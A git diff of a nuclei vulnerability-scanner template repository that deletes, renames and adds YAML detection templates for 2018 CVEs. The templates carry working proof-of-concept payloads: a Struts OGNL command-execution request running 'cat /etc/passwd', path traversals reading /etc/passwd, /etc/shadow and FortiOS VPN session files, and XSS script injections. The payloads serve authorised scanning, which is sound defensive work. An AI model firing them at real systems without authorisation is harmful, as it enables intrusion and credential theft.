a/nuclei-templates/CVE-2018/CVE-2018-11776.yaml b/nuclei-templates/CVE-2018/CVE-2018-11776.yaml deleted file mode 100644 index 9e3b7f29e4..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-11776.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2018-11776 - -info: - name: Apache Struts2 S2-057 - Remote Code Execution - author: pikpikcu - severity: high - description: | - Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace. - reference: - - https://github.com/jas502n/St2-057 - - https://cwiki.apache.org/confluence/display/WW/S2-057 - - https://security.netapp.com/advisory/ntap-20180822-0001/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-11776 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.1 - cve-id: CVE-2018-11776 - cwe-id: CWE-20 - tags: cve,cve2018,apache,rce,struts,kev - -requests: - - method: GET - path: - - "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/19 diff --git a/nuclei-templates/CVE-2018/CVE-2018-11784.yaml b/nuclei-templates/CVE-2018/CVE-2018-11784.yaml deleted file mode 100644 index 65862adf48..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-11784.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: CVE-2018-11784 - -info: - name: Apache Tomcat Open Redirect - author: geeknik - description: Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input. - reference: https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E - severity: medium - tags: tomcat,redirect,cve,cve2018 - -requests: - - method: GET - path: - - "{{BaseURL}}//example.com" - - matchers: - - type: regex - regex: - - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com" - part: header diff --git a/nuclei-templates/CVE-2018/cve-2018-12031.yaml b/nuclei-templates/CVE-2018/CVE-2018-12031.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12031.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12031.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-12054.yaml b/nuclei-templates/CVE-2018/CVE-2018-12054.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12054.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12054.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-12300.yaml b/nuclei-templates/CVE-2018/CVE-2018-12300.yaml deleted file mode 100644 index 30c92b3154..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-12300.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2018-12300 - -info: - name: Seagate NAS OS 4.3.15.1 - Open redirect - author: 0x_Akoko - severity: medium - description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter. - reference: - - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - - https://www.cvedetails.com/cve/CVE-2018-12300 - tags: cve,cve2018,redirect,seagate,nasos - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-12300 - cwe-id: CWE-601 - -requests: - - method: GET - - path: - - '{{BaseURL}}/echo-server.html?code=test&state=http://www.example.com#' - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' - part: header diff --git a/nuclei-templates/CVE-2018/CVE-2018-12613.yaml b/nuclei-templates/CVE-2018/CVE-2018-12613.yaml deleted file mode 100644 index 2391066bf6..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-12613.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2018-12613 - -info: - name: PhpMyAdmin <4.8.2 - Local File Inclusion - author: pikpikcu - severity: high - description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication). - reference: - - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 - - https://www.phpmyadmin.net/security/PMASA-2018-4/ - - https://www.exploit-db.com/exploits/44928/ - - http://web.archive.org/web/20210124181726/https://www.securityfocus.com/bid/104532/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-12613 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2018-12613 - cwe-id: CWE-287 - tags: vulhub,edb,cve,cve2018,phpmyadmin,lfi - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd' - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/06 diff --git a/nuclei-templates/CVE-2018/CVE-2018-1271.yaml b/nuclei-templates/CVE-2018/CVE-2018-1271.yaml deleted file mode 100644 index 548327e206..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-1271.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2018-1271 -info: - name: Spring MVC Directory Traversal Vulnerability - author: hetroublemakr - severity: medium - description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. - reference: - - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - - https://pivotal.io/security/cve-2018-1271 - - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699 - - https://access.redhat.com/errata/RHSA-2018:1320 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.9 - cve-id: CVE-2018-1271 - cwe-id: CWE-22 - tags: cve,cve2018,spring,lfi,traversal -requests: - - method: GET - path: - - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' - - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' - matchers-condition: and - matchers: - - type: word - words: - - 'for 16-bit app support' - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-13379.yaml b/nuclei-templates/CVE-2018/CVE-2018-13379.yaml deleted file mode 100644 index 2b87621918..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-13379.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2018-13379 - -info: - name: Fortinet FortiOS - Credentials Disclosure - author: organiccrap - severity: critical - description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal). - reference: - - https://fortiguard.com/advisory/FG-IR-18-384 - - https://www.fortiguard.com/psirt/FG-IR-20-233 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-13379 - cwe-id: CWE-22 - metadata: - verified: true - shodan-query: http.html:"/remote/login" "xxxxxxxx" - tags: cve,cve2018,fortios,lfi,kev - -requests: - - method: GET - path: - - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" - - matchers: - - type: regex - part: body - regex: - - '^var fgt_lang =' -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/CVE-2018-13980.yaml b/nuclei-templates/CVE-2018/CVE-2018-13980.yaml deleted file mode 100644 index c116c9f866..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-13980.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2018-13980 - -info: - name: Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion - author: wisnupramoedya - severity: medium - description: Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin "filebrowser" is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. - reference: - - https://www.exploit-db.com/exploits/45016 - - https://www.sec-consult.com/en/blog/advisories/remote-code-execution-local-file-disclosure-zeta-producer-desktop-cms/ - - http://packetstormsecurity.com/files/148537/Zeta-Producer-Desktop-CMS-14.2.0-Code-Execution-File-Disclosure.html - - https://nvd.nist.gov/vuln/detail/CVE-2018-13980 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2018-13980 - cwe-id: CWE-22 - tags: cve,cve2018,lfi,edb,packetstorm - -requests: - - method: GET - path: - - "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/CVE-2018/cve-2018-14064.yaml b/nuclei-templates/CVE-2018/CVE-2018-14064.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-14064.yaml rename to nuclei-templates/CVE-2018/CVE-2018-14064.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-14574.yaml b/nuclei-templates/CVE-2018/CVE-2018-14574.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-14574.yaml rename to nuclei-templates/CVE-2018/CVE-2018-14574.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-14916.yaml b/nuclei-templates/CVE-2018/CVE-2018-14916.yaml deleted file mode 100644 index 751421b50f..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-14916.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2018-14916 -info: - name: Loytec LGATE-902 Directory Traversal - author: 0x_Akoko - severity: critical - description: Loytec LGATE-902 versions prior to 6.4.2 suffer from cross site scripting, arbitrary file deletion, and directory traversal vulnerabilities. - reference: - - https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html - - https://www.cvedetails.com/cve/CVE-2018-14916 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H - cvss-score: 9.4 - cve-id: CVE-2018-14916 - cwe-id: CWE-732 - tags: cve,cve2018,loytec,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-14918.yaml b/nuclei-templates/CVE-2018/CVE-2018-14918.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-14918.yaml rename to nuclei-templates/CVE-2018/CVE-2018-14918.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-15473.yaml b/nuclei-templates/CVE-2018/CVE-2018-15473.yaml new file mode 100644 index 0000000000..2392e8714b --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-15473.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-15473 +info: + name: OpenSSH Username Enumeration <= v7.7 + author: r3dg33k,daffainfo,forgedhallpass + severity: medium + description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 + - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 + - https://bugs.debian.org/906236 + - http://www.openwall.com/lists/oss-security/2018/08/15/5 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2018-15473 + cwe-id: CWE-362 + tags: network,openssh,cve,cve2018 +network: + - host: + - "{{Hostname}}" + - "{{Host}}:22" + matchers: + - type: regex + regex: + - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)' + extractors: + - type: regex + regex: + - '(?i)SSH-2.0-OpenSSH_[^\r]+' diff --git a/nuclei-templates/CVE-2018/CVE-2018-15657.yaml b/nuclei-templates/CVE-2018/CVE-2018-15657.yaml new file mode 100644 index 0000000000..9e75ab5103 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-15657.yaml @@ -0,0 +1,28 @@ +id: CVE-2018-15657 +info: + name: SureMDM Local / Remote File Inclusion + author: 0x_akoko + severity: high + description: SureMDM versions prior to the 2018-11 Patch suffers from local and remote file inclusion vulnerabilities. + reference: + - https://packetstormsecurity.com/files/151469/SureMDM-Local-Remote-File-Inclusion.html + - https://www.cvedetails.com/cve/CVE-2018-15657 + classification: + cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.3 + cve-id: CVE-2018-15657 + cwe-id: CWE-918 + tags: cve,cve2018,suremdm,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/api/DownloadUrlResponse.ashx?url=file://C:/windows/win.ini" + stop-at-first-match: true + matchers: + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body diff --git a/nuclei-templates/CVE-2018/cve-2018-15745.yaml b/nuclei-templates/CVE-2018/CVE-2018-15745.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-15745.yaml rename to nuclei-templates/CVE-2018/CVE-2018-15745.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-15961.yaml b/nuclei-templates/CVE-2018/CVE-2018-15961.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-15961.yaml rename to nuclei-templates/CVE-2018/CVE-2018-15961.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16059.yaml b/nuclei-templates/CVE-2018/CVE-2018-16059.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16059.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16059.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16133.yaml b/nuclei-templates/CVE-2018/CVE-2018-16133.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16133.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16133.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16167.yaml b/nuclei-templates/CVE-2018/CVE-2018-16167.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16167.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16167.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16288.yaml b/nuclei-templates/CVE-2018/CVE-2018-16288.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16288.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16288.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16299.yaml b/nuclei-templates/CVE-2018/CVE-2018-16299.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16299.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16299.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16341.yaml b/nuclei-templates/CVE-2018/CVE-2018-16341.yaml deleted file mode 100644 index 4e7c94456e..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-16341.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2018-16341 - -info: - name: Nuxeo <10.3 - Remote Code Execution - author: madrobot - severity: high - description: | - Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection. - classification: - cve-id: CVE-2018-16341 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-16299 - tags: cve,cve2018,nuxeo,ssti,rce,bypass - -requests: - - method: GET - path: - - "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml" - - matchers: - - type: word - part: body - words: - - "31333333337" - -# Enhanced by mp on 2022/06/13 diff --git a/nuclei-templates/CVE-2018/CVE-2018-16671.yaml b/nuclei-templates/CVE-2018/CVE-2018-16671.yaml deleted file mode 100644 index df6b1f3871..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-16671.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2018-16671 - -info: - name: CirCarLife SCADA Device ID - description: System software information disclosure due to lack of authentication - reference: - - https://www.exploit-db.com/exploits/45384 - author: geeknik - severity: medium - tags: cve,cve2018,circarlife,scada,iot,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/html/device-id" - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "CirCarLife Scada" - - type: word - part: body - words: - - "circontrol" - - type: regex - part: body - regex: - - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" diff --git a/nuclei-templates/CVE-2018/cve-2018-17422.yaml b/nuclei-templates/CVE-2018/CVE-2018-17422.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-17422.yaml rename to nuclei-templates/CVE-2018/CVE-2018-17422.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-18069.yaml b/nuclei-templates/CVE-2018/CVE-2018-18069.yaml deleted file mode 100644 index 8407f914d4..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18069.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2018-18069 - -info: - name: WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting - author: nadino - severity: medium - description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php - request to wp-admin/admin.php. - reference: - - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-18069 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-18069 - cwe-id: CWE-79 - tags: cve,cve2018,wordpress,xss,plugin - -requests: - - method: POST - path: - - "{{BaseURL}}/wp-admin/admin.php" - - body: | - icl_post_action=save_theme_localization&locale_file_name_en=EN"> - - host-redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - 'contains(tolower(all_headers), "text/html")' - - 'contains(set_cookie, "_icl_current_admin_language")' - - 'contains(body, "\">")' - condition: and - -# Enhanced by mp on 2022/04/08 diff --git a/nuclei-templates/CVE-2018/CVE-2018-18608.yaml b/nuclei-templates/CVE-2018/CVE-2018-18608.yaml deleted file mode 100644 index c8501bfe0f..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18608.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2018-18608 -info: - name: DedeCMS V5.7 - Cross Site Scripting - author: ritikchaddha - severity: medium - description: | - DedeCMS 5.7 SP2 allows XSS via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php. - reference: - - https://github.com/ky-j/dedecms/issues/8 - - https://nvd.nist.gov/vuln/detail/CVE-2018-18608 - - https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-18608 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"DedeCms" - verified: "true" - tags: dedecms,xss,cve,cve2018 -requests: - - method: GET - path: - - "{{BaseURL}}/plus/feedback.php/rp4hu%27>" - - "DedeCMS Error Warning!" - condition: and - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-18775.yaml b/nuclei-templates/CVE-2018/CVE-2018-18775.yaml deleted file mode 100644 index a6dcb26ecb..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18775.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2018-18775 - -info: - author: 0x_Akoko - description: Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter - name: Cross Site Scripting in Microstrategy Web version 7 - severity: medium - tags: microstrategy,xss - reference: https://www.exploit-db.com/exploits/45755 - -requests: - - method: GET - path: - - '{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/CVE-2018/CVE-2018-18777.yaml b/nuclei-templates/CVE-2018/CVE-2018-18777.yaml deleted file mode 100644 index ca48a4b0e2..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18777.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: CVE-2018-18777 - -info: - name: Path traversal vulnerability in Microstrategy Web version 7 - author: 0x_Akoko - severity: high - reference: https://www.exploit-db.com/exploits/45755 - tags: microstrategy,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-18778.yaml b/nuclei-templates/CVE-2018/CVE-2018-18778.yaml deleted file mode 100644 index 6c269ecee5..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18778.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2018-18778 -info: - name: mini_httpd Path Traversal - author: dhiyaneshDK - severity: medium - description: ACME mini_httpd before 1.30 lets remote users read arbitrary files. - reference: - - https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ - - http://www.acme.com/software/mini_httpd/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 - cve-id: CVE-2018-18778 - cwe-id: CWE-200 - tags: cve,cve2018,lfi,mini_httpd -requests: - - raw: - - |+ - GET /etc/passwd HTTP/1.1 - Host: - - unsafe: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2018/cve-2018-18925.yaml b/nuclei-templates/CVE-2018/CVE-2018-18925.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-18925.yaml rename to nuclei-templates/CVE-2018/CVE-2018-18925.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-19137.yaml b/nuclei-templates/CVE-2018/CVE-2018-19137.yaml deleted file mode 100644 index c689c4e74a..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19137.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2018-19137 -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Reflected Cross Site Scripting (rXSS) via assets/edit/ip-address.php. - reference: - - https://github.com/domainmod/domainmod/issues/79 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19137 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-19137 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '&really_del' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-19326.yaml b/nuclei-templates/CVE-2018/CVE-2018-19326.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-19326.yaml rename to nuclei-templates/CVE-2018/CVE-2018-19326.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-19365.yaml b/nuclei-templates/CVE-2018/CVE-2018-19365.yaml deleted file mode 100644 index 439a9ef72c..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19365.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2018-19365 -info: - name: Wowza Streaming Engine Manager Directory Traversal - author: 0x_Akoko - severity: high - description: The REST API in Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request - reference: - - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html - - https://www.cvedetails.com/cve/CVE-2018-19365 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-19365 - cwe-id: CWE-22 - tags: cve,cve2018,wowza,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/shadow&logSource=engine" - matchers-condition: and - matchers: - - type: word - words: - - "root:*:" - - "bin:*:" - condition: and - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-19458.yaml b/nuclei-templates/CVE-2018/CVE-2018-19458.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-19458.yaml rename to nuclei-templates/CVE-2018/CVE-2018-19458.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-19751.yaml b/nuclei-templates/CVE-2018/CVE-2018-19751.yaml new file mode 100644 index 0000000000..e6ff1a9869 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19751.yaml @@ -0,0 +1,52 @@ +id: CVE-2018-19751 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /admin/ssl-fields/add.php Display Name, Description & Notes fields parameters. + reference: + - https://www.exploit-db.com/exploits/45947/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-19751 + - https://github.com/domainmod/domainmod/issues/83 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19751 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /admin/ssl-fields/add.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test + - | + GET /admin/ssl-fields/ HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19753.yaml b/nuclei-templates/CVE-2018/CVE-2018-19753.yaml deleted file mode 